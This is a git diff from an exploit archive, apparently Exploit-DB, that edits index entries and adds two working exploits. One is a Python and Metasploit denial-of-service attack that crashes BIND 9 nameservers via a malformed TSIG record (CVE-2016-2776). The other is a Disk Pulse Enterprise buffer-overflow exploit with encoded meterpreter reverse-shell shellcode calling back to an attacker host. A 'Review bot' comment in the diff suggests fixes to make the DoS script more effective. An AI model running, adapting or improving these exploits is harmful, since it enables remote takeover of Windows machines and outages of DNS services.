 35066,platforms/php/webapps/35066.txt,"WordPress Plugin Processing Embed 0.5 - 'pluginurl' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0
-35067,platforms/php/webapps/35067.txt,"WordPress Plugin Safe Search 'v1' Parameter - Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0
+35067,platforms/php/webapps/35067.txt,"WordPress Plugin Safe Search - 'v1' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0
 35068,platforms/hardware/remote/35068.txt,"pfSense - pkg_edit.php id Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0
 35069,platforms/hardware/remote/35069.txt,"pfSense - pkg.php xml Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0
 35070,platforms/hardware/remote/35070.txt,"pfSense - status_graph.php if Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0
@@ -31696,7 +31696,7 @@ id,file,description,date,author,platform,type,port
 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0
 35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution",2014-10-27,Vulnerability-Lab,ios,webapps,1861
 35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent Cross-Site Scripting",2014-10-27,Vulnerability-Lab,ios,webapps,0
-35084,platforms/php/webapps/35084.txt,"WordPress Plugin Twitter Feed 'url' Parameter - Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0
+35084,platforms/php/webapps/35084.txt,"WordPress Plugin Twitter Feed - 'url' Parameter Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0
 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0
 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0
 35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0
@@ -32383,7 +32383,7 @@ id,file,description,date,author,platform,type,port
 35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting",2011-06-06,"Patrick Webster",php,webapps,0
 35833,platforms/php/webapps/35833.txt,"Xataface 1.x - 'action' Parameter Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0
 35834,platforms/php/webapps/35834.txt,"Blog:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0
-35835,platforms/php/webapps/35835.txt,"WordPress Plugin GD Star Rating 'votes' Parameter - SQL Injection",2011-06-08,anonymous,php,webapps,0
+35835,platforms/php/webapps/35835.txt,"WordPress Plugin GD Star Rating - 'votes' Parameter SQL Injection",2011-06-08,anonymous,php,webapps,0
 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,linux,remote,0
 35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Parameter Cross-Site Scripting",2011-06-07,LiquidWorm,php,webapps,0
 35838,platforms/php/webapps/35838.txt,"Tolinet Agencia - 'id' Parameter SQL Injection",2011-06-10,"Andrea Bocchetti",php,webapps,0
@@ -32519,7 +32519,7 @@ id,file,description,date,author,platform,type,port
 35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0
 35965,platforms/php/webapps/35965.txt,"Joomla! Component com_resman - Cross-Site Scripting",2011-07-15,SOLVER,php,webapps,0
 35966,platforms/php/webapps/35966.txt,"Joomla! Component com_newssearch - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
-35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter - SQL Injection",2011-07-15,Lazmania61,php,webapps,0
+35967,platforms/php/webapps/35967.txt,"AJ Classifieds - 'listingid' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
 35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps,0
 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0
 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ - Cross-Site Request Forgery / HTML Injection",2011-07-18,MustLive,hardware,remote,0
@@ -32589,7 +32589,7 @@ id,file,description,date,author,platform,type,port
 36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection",2015-02-11,Vulnerability-Lab,php,webapps,8080
 36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow (Metasploit)",2015-02-11,Metasploit,windows,remote,9256
 36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Persistent Cross-Site Scripting",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311
-36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0
+36070,platforms/php/dos/36070.txt,"PHP < 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0
 36061,platforms/php/webapps/36061.php,"WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0
 36062,platforms/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Privilege Escalation",2015-02-13,"Humberto Cabrera",windows,local,0
 36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0
@@ -32960,7 +32960,7 @@ id,file,description,date,author,platform,type,port
 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080
 36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443
 36442,platforms/linux/webapps/36442.txt,"Citrix Nitro SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps,0
-36443,platforms/windows/dos/36443.txt,"Opera Web Browser Prior to 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities",2011-12-12,anonymous,windows,dos,0
+36443,platforms/windows/dos/36443.txt,"Opera Web Browser < 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities",2011-12-12,anonymous,windows,dos,0
 36444,platforms/php/webapps/36444.txt,"WordPress Plugin flash-album-gallery - 'flagshow.php' Cross-Site Scripting",2011-12-13,Am!r,php,webapps,0
 36445,platforms/php/webapps/36445.txt,"WordPress Plugin The Welcomizer 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps,0
 36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0
@@ -32999,6 +32999,7 @@ id,file,description,date,author,platform,type,port
 36487,platforms/php/webapps/36487.txt,"WordPress Plugin Comment Rating 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0
 36488,platforms/php/webapps/36488.txt,"WordPress Plugin WHOIS 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0
 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0
+40453,platforms/multiple/dos/40453.py,"Bind 9 DNS Server - Denial of Service",2016-10-04,Infobyte,multiple,dos,53
 36490,platforms/php/webapps/36490.py,"WordPress Plugin WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
 36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
@@ -35874,8 +35875,8 @@ id,file,description,date,author,platform,type,port
 39552,platforms/php/webapps/39552.txt,"WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80
 39553,platforms/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
 39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80
-39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
-39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
+39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
+39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow Denial of Service",2016-03-14,INSECT.B,windows,dos,0
 39558,platforms/php/webapps/39558.txt,"WordPress Plugin Site Import 1.0.1 - Local File Inclusion / Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80
 39559,platforms/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",php,webapps,80
@@ -35984,7 +35985,7 @@ id,file,description,date,author,platform,type,port
 39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443
 39677,platforms/hardware/webapps/39677.html,"Hikvision Digital Video Recorder - Cross-Site Request Forgery",2016-04-11,LiquidWorm,hardware,webapps,80
 39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80
-39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80
+39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 < 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80
 39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - .'ZIP' File Directory Traversal",2016-04-11,hyp3rlinx,windows,local,0
 39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947
 39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80
@@ -36570,3 +36571,4 @@ id,file,description,date,author,platform,type,port
 40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0
 40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
 40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0
+40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
diff --git a/platforms/multiple/dos/40453.py b/platforms/multiple/dos/40453.py
new file mode 100755
index 000000000..37ff5616e
--- /dev/null
+++ b/platforms/multiple/dos/40453.py 
@@ -0,0 +1,201 @@ +import socket +import struct + +TARGET = ('192.168.200.10', 53) + +Q_A = 1 +Q_TSIG = 250 +DNS_MESSAGE_HEADERLEN = 12 + + +def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512): + query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01" + + sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1 + tsig_rr = build_tsig_rr(sweet_spot) + + return query_A + tsig_rr + +def int16(n): + return struct.pack("!H", n) + +def build_tsig_rr(bind_demarshalled_size): + signature_data = ("\x00\x00\x57\xeb\x80\x14\x01\x2c\x00\x10\xd2\x2b\x32\x13\xb0\x09" + "\x46\x34\x21\x39\x58\x62\xf3\xd5\x9c\x8b\x8f\x65\x00\x00\x00\x00") + tsig_rr_extra_fields = "\x00\xff\x00\x00\x00\x00" + + necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields) + necessary_bytes += 2 + 2 # length fields + + # from sizeof(TSIG RR) bytes conforming the TSIG RR + # bind9 uses sizeof(TSIG RR) - 16 to build its own + sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16) + + tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields + tsig_data = algo_name + signature_data + return tsig_hdr + int16(len(tsig_data)) + tsig_data + +def generate_padding(n): + max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d] + buckets = [1] * len(max_per_bucket) + + min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte + max_size = sum(max_per_bucket) + len(buckets) + 2 + + if not(min_size <= n <= max_size): + raise RuntimeException("unsupported amount of bytes") + + curr_idx, n = 0, n - min_size + while n > 0: + next_n = max(n - (max_per_bucket[curr_idx] - 1), 0) + buckets[curr_idx] = 1 + n - next_n + n, curr_idx = next_n, curr_idx + 1 + + n_padding = lambda amount: chr(amount) + "A" * amount + stringify = lambda sizes: "".join(map(n_padding, sizes)) + "\x00" + + return stringify(buckets[:4]), stringify(buckets[4:]) + +if __name__ == "__main__": + bombita = build_bind_nuke() + + s = 
socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.sendto(bombita, TARGET) + s.close() + +''' +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'timeout' +require 'socket' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Capture + include Msf::Auxiliary::UDPScanner + include Msf::Auxiliary::Dos + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => 'BIND 9 DoS CVE-2016-2776', + 'Description' => %q{ + Denial of Service Bind 9 DNS Server CVE-2016-2776. + Critical error condition which can occur when a nameserver is constructing a response. + A defect in the rendering of messages into packets can cause named to exit with an + assertion failure in buffer.c while constructing a response to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address isnt allowed + to make queries. 
+ }, + # Research and Original PoC - msf module author + 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-2776' ], + [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] + ], + 'DisclosureDate' => 'Sep 27 2016', + 'DefaultOptions' => {'ScannerRecvWindow' => 0} + )) + + register_options([ + Opt::RPORT(53), + OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) + ]) + + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') + end + + def check_server_status(ip, rport) + res = "" + sudp = UDPSocket.new + sudp.send(valid_query, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end + + if(res.length==0) + print_good("Exploit Success (Maybe, nameserver did not replied)") + else + print_error("Exploit Failed") + end + end + + def scan_host(ip) + @flag_success = true + print_status("Sending bombita (Specially crafted udp packet) to: "+ip) + scanner_send(payload, ip, rport) + check_server_status(ip, rport) + end + + def get_domain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + get_domain = domain+org + end + + def payload + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query += "\x00\x00" # Flags: 0x0000 Standard query + query += "\x00\x01" # Questions: 1 + query += "\x00\x00" # Answer RRs: 0 + query += "\x00\x00" # Authority RRs: 0 + query += "\x00\x01" # Additional RRs: 1 + + # Doman Name + query += get_domain # Random DNS Name + query += "\x00" # [End of name] + query += "\x00\x01" # Type: A (Host Address) (1) + query += "\x00\x01" # Class: IN (0x0001) + + # Aditional records. 
Name + query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes + query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) + query += "\x00" + + query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) + query += "\x00\xff" # Class: ANY (0x00ff) + query += "\x00\x00\x00\x00" # Time to live: 0 + query += "\x00\xfc" # Data length: 252 + + # Algorithm Name + query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes + query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes + query += "\x00" + + # Rest of TSIG + query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART + query += "\x01\x2c" # Fudge: 300 + query += "\x00\x10" # MAC Size: 16 + query += Rex::Text.rand_text_alphanumeric(16) # MAC + query += "\x8f\x65" # Original Id: 36709 + query += "\x00\x00" # Error: No error (0) + query += "\x00\x00" # Other len: 0 + end + + def valid_query + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query += "\x00\x00" # Flags: 0x0000 Standard query + query += "\x00\x01" # Questions: 1 + query += "\x00\x00" # Answer RRs: 0 + query += "\x00\x00" # Authority RRs: 0 + query += "\x00\x00" # Additional RRs: 0 + + # Doman Name + query += get_domain # Random DNS Name + query += "\x00" # [End of name] + query += "\x00\x01" # Type: A (Host Address) (1) + query += "\x00\x01" # Class: IN (0x0001)s + end + +end +''' diff --git a/platforms/unix/remote/22442.c b/platforms/unix/local/22442.c similarity index 100% rename from platforms/unix/remote/22442.c rename to platforms/unix/local/22442.c diff --git a/platforms/windows/remote/40452.py b/platforms/windows/remote/40452.py new file mode 100755 index 000000000..e5f96d630 --- /dev/null +++ b/platforms/windows/remote/40452.py 
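Review bot: The range check in `generate_padding` raises `RuntimeException`, which is not a Python name, so an out-of-range byte count surfaces as a `NameError` rather than the intended message; it should read `raise RuntimeError("unsupported amount of bytes")` (or `ValueError`, since it is an argument-range failure). The standalone script then fires one UDP datagram at the hard-coded `TARGET` and exits without printing anything, so the operator cannot tell whether `named` actually hit the assertion; sending a follow-up A query and reporting a timeout, as the embedded Metasploit module's `check_server_status` does, would make the PoC self-verifying. Note that `check_server_status` itself treats any missing reply as a probable success, so a filtered port or a dropped datagram is reported the same way as a crash. The whole file lies within this hunk.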
@@ -0,0 +1,93 @@ +#!/usr/bin/python + +print "Disk Pulse Enterprise 9.0.34 Buffer Overflow Exploit" +print "Author: Tulpa // tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa-security.com + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Greetings to ozzie_offsec and carbonated +#Special Shoutout to unfo- for making me look closer + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.132',80)) + +#bad chars \x00\x0a\x0d\x26 + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + +buf = "" +buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b" +buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9" +buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda" +buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a" +buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8" +buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c" +buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1" +buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76" +buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27" +buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb" +buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4" +buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17" +buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40" +buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55" +buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa" +buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48" +buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b" +buf += 
"\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8" +buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84" +buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6" +buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c" +buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1" +buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f" +buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc" + +#pop pop ret 1001A333 + +nseh = "\x90\x90\xEB\x0B" +seh = "\x33\xA3\x01\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 12292 #subtract/add for payload +evil += "w00tw00t" +evil += "\x90" * 20 +evil += buf +evil += "\x90" * 50 +evil += "\x42" * 1614 +evil += nseh +evil += seh +evil += "\x90" * 20 +evil += egghunter +evil += "\x90" * 7000 + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() +